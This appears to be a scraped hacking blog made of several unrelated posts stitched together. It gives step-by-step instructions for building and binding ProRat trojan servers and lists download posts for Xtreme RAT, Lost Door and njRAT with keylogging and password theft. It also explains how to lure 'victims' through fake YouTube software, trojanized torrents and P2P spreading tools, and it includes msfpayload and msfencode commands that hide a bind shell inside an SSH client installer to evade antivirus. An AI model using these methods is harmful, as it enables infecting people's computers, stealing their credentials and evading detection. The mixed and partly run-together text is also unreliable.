Hi guys..today i am going to show you how to set up ProRat and how to hack a computer using it. Well, i am going to finish up RAT setup articles with this. I will give the counter measures in my next article. As i haven’t written any articles on direct connection Trojans, I decided to write the one on PRORAT.
If you are new to RATing, it is strongly recommended to read my previous articles which give you all the basic and advanced stuff about RATs.

Hack Remote Computers using EXTREME RAT
Trojans and RATs- Know The Facts
DARK-COMET v4.2 RAT TUTORIAL

procedure to setup ProRat

STEP 1. First of all Download ProRat from here. Once it is downloaded extract it. A password prompt will come up. Enter the password.The password "pro".

STEP 2. Open up the program and You should see the following window.






STEP 3. Click on the "Create" button in the bottom. Choose "Create ProRat Server".





STEP 4. Next put your IP address so the server could connect to you. You need not enter your IP address manually, you can do this by just clicking on the little arrow. it automatically fills your IP address.
Next put in your e-mail so that when and if a victim gets infected it will send you an email.





STEP 5. Now Open General settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager. Just follow the steps as shown in the figure.





STEP 6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. You can select an image, text file or pdf file, So as to make the victim trust your file.





STEP 7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I prefer using .exe files.





STEP 8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is.





STEP 9. After this, press Create server, your server will be in the same folder as ProRat. Start giving this file to your victim. When the victim double click the file, his computer will be in your control.





STEP 10. Now the hacker has lot of options to choose from. He can do many funny things with the victim’s computer.






NOTE: In this tutorial, i put the victim’s IP as 127.0.0.1 as i am testing it on my computer. Inorder to hack a remote computer, you need to get the IP address of your victim. If you dont know how to find an IP address, you can read my article on finding out remote IP address from here.


How to hack an IP address of a remote computer


Hope you enjoyed the tutorial. Feel free to leave your comments for further doubts andclarifications.

This is a tool that allow you to control your computer from anywhere in world.

With full support to Unicode language, you will never have problem using this software.

Here you can find new updates, informations and tutorials about this software.

Send suggestions or problems reports to xtremerat@hotmail.com ornewxtremerat@gmail.com

For More Information Go to the site Official : http://sites.google.com/site/nxtremerat/



Version 3.5
Changes:

- Added option to Enable or Disable Skins
- Added option to change creation date of your servers (Select Hide Server)
- Added Firefox version 10 passwords
- Option to change groups fixed
- New skins added (download skins.zip and extract it into skins folder)
- Option to select a notify image of each server
- Many small improvements and bugfixes
- Only €40 for unlimited connections and free updates.
- FUD version, unlimited connections and free updates €100 

LoL €100 Don't forget :) here everything is FREE

Download :

MEDIAFIRE

Enjoy !!!

How To Use Lost¬Door V7 Legion

 Lost Door is a remote administration and spying tool for Microsoft Windows operating systems.



o Download Lost¬Door V7 Legion : MirrorCreator

Lost Door strong and the advantage that it operates in all windows systems

Download :

MEDIAFIRE

Or

Sendspace

* Screen Capture Qualty Fixed
* Keylogger bug fixed
* Passwords all bug fixed
* Open Webpage work is now!
* Add DNS updater (No-IP)

windows 8 compatibility

and more...

Download :

FileSwap

Or

RGhost

Name : NJrat

version : 5.0

Features:

1: stup outside + Source Code st the stup
2: Repaired Kilogger the record all letters
4: filming screen
5: CHAT with the victim
6: The server now accept encryption with the Dot Net programs
7: change the size of the screen on the right
8: Many repairs for the stability of the connection between the program and the victim

Download :

GE.TT

Or

SendSpace

 

Panel :


Binary Has been modded :

- Two calls to decryption routine have been nopped


Panel  :

- Took off 2 Links calling exe.php (get your build) and dns.php (missing files still both useless) ...
- Tranlated Some Russian Shit here and there ...


Successfully tested on : WinXP SP3 / IE8

Download :

GE.TT

Or

FileSwap

Maybe you saw some people get hundreds of victims every day They rely on the penetration of random And all their victims from popular forums and torrent Today I will explain to you the ways in which they use .



Sources of the victims :

Torrrent
Social networks & Forums
Sites publish the files like dvb-upload.com
Chat rooms

How to get victims :

• Create a fake software  Has become a widespread phenomenon in youtubeYou can experiment and you'll get thousands of victims But you first have to increase the number of Views I advise you to use vagex.com and Of course you you must to disable comment on your video

• Torrent the best source of victim you can easily create your account in thepiratebay.com and create a torent using Any program that supports torrent just choose a software and inject or bind this software with your clean server and do not forget to add trackers  in your torrent

This video explain how to create a torrent :

• from the forums you can get a lot of victims Some times I put private software and remember Do not put a download link But (Pm Me :D for mediafire link) To target members :) So this method is not in all forums you can put the link in the warez site There is no need not explain :)

Some professional hackers Use other ways They scan  A large number of Random Ip To discover Exploit Will generally put a special topic in this type ...

And finally offer you a program named  Spread Robot With this program you can spread your server in(Shareaza - Areas - eMule )

The main interface of the program:

Click Get Warez :

and choose the path of your server and Make Warez File :

Then the software will create a file in which each of these programs and share the files in (Shareaza - Areas - eMule )

 Always select Icon Setup or Install the Server and pumb the files  Even up to 2mg  using hex workshop

Download :

Spread Robot

The 'Zeus Trojan Horse' Virus once again had a come back. According to a resource, it has an ability to drain your Bank accounts easily.

Zeus Virus can propagate through phishing messages that are generated from the account that was already compromised with phishing. That phished account will then start sending messages to your friends containing links to the ads and would ask them to simply check-out the video or product by clicking on such links. This way the virus will go viral.


Readers are requested to stay refrain from clicking such links, because they might end up getting their accounts compromised The virus is very sophisticated, so that it could replace the website of a bank with the mimicked page of its own.

That fake page could then ask for your security information and some other important data that could be easily sold in black market.

According to many sources, perhaps it has been confirmed that those pages are being hosted by Russian Mafia (known as Russian Business Network as well).

About Zeus(Virus)

The virus is well-known for what it use to do. It was detected once back in 2007, and after that detection it started to spread online. The virus is well-designed so that if you would click on it, the possible and important data like Passwords and Bank Accounts can be stolen easily.

Does Facebook Took Action Against It?

Facebook is aware of it, but it is unlikely that Facebook is going to take any action against it.

The founder of advocacy group Fans Against Kounterfeit Enterprise (FAKE) said that he was trying to alert Facebook about this issue to take action against it as soon as possible, but unluckily he was not satisfied well with their response.

Those who are using windows should stay much careful about this issue. It has been said that Windows devices are much infected with this virus. Hence, Mac OS X or Linux are still safe of this virus.

Some countries like USA and UK are badly infected, though, India, Russia, Canada and France are also infected with the virus at some moderate  limits. Some other countries like Australia, Argentina, Brazil, South Africa, Chile, Saudi Arabia, Pakistan, Indonesia and some other South-East Asian and European countries are less affected by this virus.

So in this tutorial we will show you step by step on how to make a virus Fully Undetectable from all the antiviruses. Thought their are lots of approaches, however our team member Malik Rafay has managed to find a way to make an executable FUD using msfencode.

Requirements 

A Backtrack machine , real or virtual. I used Backtrack 5 r3, but other versions of Backtrack are working OK too !!!
Attention !!!

We are using some harmless test files but don't infect people with any real viruses that's a Crime and we here at hax0rtools are not responsible for.
Purpose:

Antivirus protects machines from malware but not all of it .there are ways to pack malware to make it harder to detect. well use metasploit to render malware completely invisible to antivirus. 

Creating a Listener:

This is a simple payload that gives the attacker remote control of a machine. It is not a virus ant won't spread, but it is detected by antivirus engines. In Backtrack in a Terminal windows execute these commands:  

cd
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe

You should see the listen.exe file as shown below: 

Analyzing the Listener with VirusTotal

Go to https://www.virustotal.com/en/

Click the "Choose File" button. Navigate to /root and double-click the listen.exe"listen.exe" appears in the "Choose File" box, as shown below:

In the virustotal web page , Click the "scan it" button !!!

If you see a "File already analyzed" message, click the "View last analysis" button.

The analysis shows that many of the antivirus engines detected the file--33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.

Encoding the Listener 

this process will encode the listener, & insert it into an innocent SSH file.

In BackTrack, in a Terminal window, execute these commands:

wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exemsfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1ls -l evil*

You should see the evil-ssh.exe file as shown below :

Scan with virusTOTAL

Go to: https://www.virustotal.com/

If you see a "File already analyzed" message, click the "View last analysis" button.

The analysis shows that fewer of the antivirus engines detect the file now--21 out of 42, when I did it, as shown below. You may see different numbers.

 

Encode the Listener Again This process will encode the listener with several different encodings.

In BackTrack, in a Terminal window, execute these commands:

msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1msfencode -i /root/listen2.exe -t raw -o

/root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1

msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1ls -l listen*

You should see several files as shown below : 

Analyzing Again

The analysis shows that fewer of the antivirus engines detect the file now 0 out of 42 When I did it as shown below. you may see different numbers.